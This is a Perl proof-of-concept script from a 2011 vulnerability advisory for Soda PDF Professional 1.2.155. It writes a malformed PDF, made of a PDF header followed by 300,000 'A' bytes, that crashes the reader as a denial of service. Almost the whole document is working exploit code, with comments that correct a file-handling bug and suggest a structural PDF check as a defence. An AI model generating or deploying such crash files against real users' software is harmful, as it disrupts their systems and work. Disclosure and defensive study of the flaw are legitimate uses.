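#!/usr/bin/perl
#
#
# Soda PDF Professional 1.2.155 PDF/WWF File Handling Restriction of Service (RoS)
#
#
# Vendor: LULU software
# Product web page: http://www.sodapdf.com
# Affected version: 1.2.155.1729 (Professional with OCR)
#
# Summary: Increase your efficiency with Soda PDF Professional, the smart
# & simple tool for opening, creating, editing, converting, and securing
# PDF files in a collaborative environment. Save time by using powerful
# automated features like batch PDF creation, professional templates &
# document comparison.
#
# Desc: Soda PDF Pro suffers from a restriction of service (RoS) vulnerability
# when handling PDF or WWF file formats which can be exploited by malicious
# people to cause a denial of service scenario.
#
#
# Tested on: Microsoft Windows XP Professional SP3 (EN)
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# liquidworm gmail com
#
#
# Advisory ID: ZSL-2011-5056
# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5056.php
#
#
# 10.11.2011
#

use strict;
use warnings;

# Name of the test file written to the current directory.
my $file = "Midnight_in_Paris.pdf"; # or .wwf

# File content: the five bytes "%PDF\n" followed by 300000 bytes of 0x41 ('A').
# Nothing after the magic is PDF structure (no objects, xref table or trailer),
# so the impact described above is availability only, triggered when the
# affected version parses the file.
# Defender note: a structural validity check on inbound PDFs (magic present but
# no parsable body or trailer) would reject a file of this shape before it
# reaches a desktop reader. This header names no fixed version; confirm patch
# status against the advisory.
my $tovar = "\x25\x50\x44\x46\x0A"."\x41" x 300000;

print "\n\n[*] Creating $file file...\n";

# Three-argument open with a lexical handle and low-precedence `or`.
# The original `open ZSL, ">./$file" || die ...` applied `||` to the
# (always true) mode string, so a failed open was never reported and the
# script went on to print a success message with nothing written.
open(my $zsl, '>', "./$file") or die "\nCan't open $file: $!";

print {$zsl} $tovar or die "\nCan't write $file: $!";

# Buffered write errors only surface at close, so check it before
# announcing success.
close($zsl) or die "\nCan't close $file: $!";

print "\n[.] File successfully mounted!\n\n";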